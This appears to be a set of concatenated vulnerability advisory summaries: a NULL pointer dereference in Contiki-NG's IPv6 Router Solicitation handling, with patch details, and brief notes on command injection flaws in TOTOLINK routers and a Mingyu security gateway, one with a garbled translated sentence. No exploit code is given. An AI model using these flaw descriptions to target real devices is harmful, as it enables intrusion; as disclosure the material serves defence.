The Contiki-NG operating system versions 4.8 and prior can be triggered to dereference a NULL pointer in the message handling code for IPv6 router solicitiations. Contiki-NG contains an implementation of IPv6 Neighbor Discovery (ND) in the module `os/net/ipv6/uip-nd6.c`. The ND protocol includes a message type called Router Solicitation (RS), which is used to locate routers and update their address information via the SLLAO (Source Link-Layer Address Option). If the indicated source address changes, a given neighbor entry is set to the STALE state. The message handler does not check for RS messages with an SLLAO that indicates a link-layer address change that a neighbor entry can actually be created for the indicated address. The resulting pointer is used without a check, leading to the dereference of a NULL pointer of type `uip_ds6_nbr_t`. The problem has been patched in the `develop` branch of Contiki-NG, and will be included in the upcoming 4.9 release. As a workaround, users can apply Contiki-NG pull request #2271 to patch the problem directly. Contiki-NG for, NULL There is a vulnerability in pointer dereference.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state. Contiki-NG is an open-source, cross-platform operating system for next-generation IoT (Internet of Things) devices

TOTOLINK X5000R is a gigabit dual-band WiFi6 router. There is a command execution vulnerability in TOTOLINK X5000R, which can be exploited by attackers to execute arbitrary commands.

Mingyu security gateway builds a next-generation security protection system for full-process defense, and integrates traditional firewalls, intrusion detection, intrusion prevention systems, anti-virus gateways, Internet behavior control, VPN gateways, threat intelligence and other security modules into an intelligent security gateway . There is a command execution vulnerability in Mingyu security gateway of Hangzhou Anheng Information Technology Co., Ltd. Attackers can use this vulnerability to execute arbitrary commands.

TOTOLINK A7100RU V7.4cu.2313_B20191024 has a Command Injection vulnerability. An attacker can obtain a stable root shell through a specially constructed payload

TOTOLINK A7100RU V7.4cu.2313_B20191024 is vulnerable to Command Injection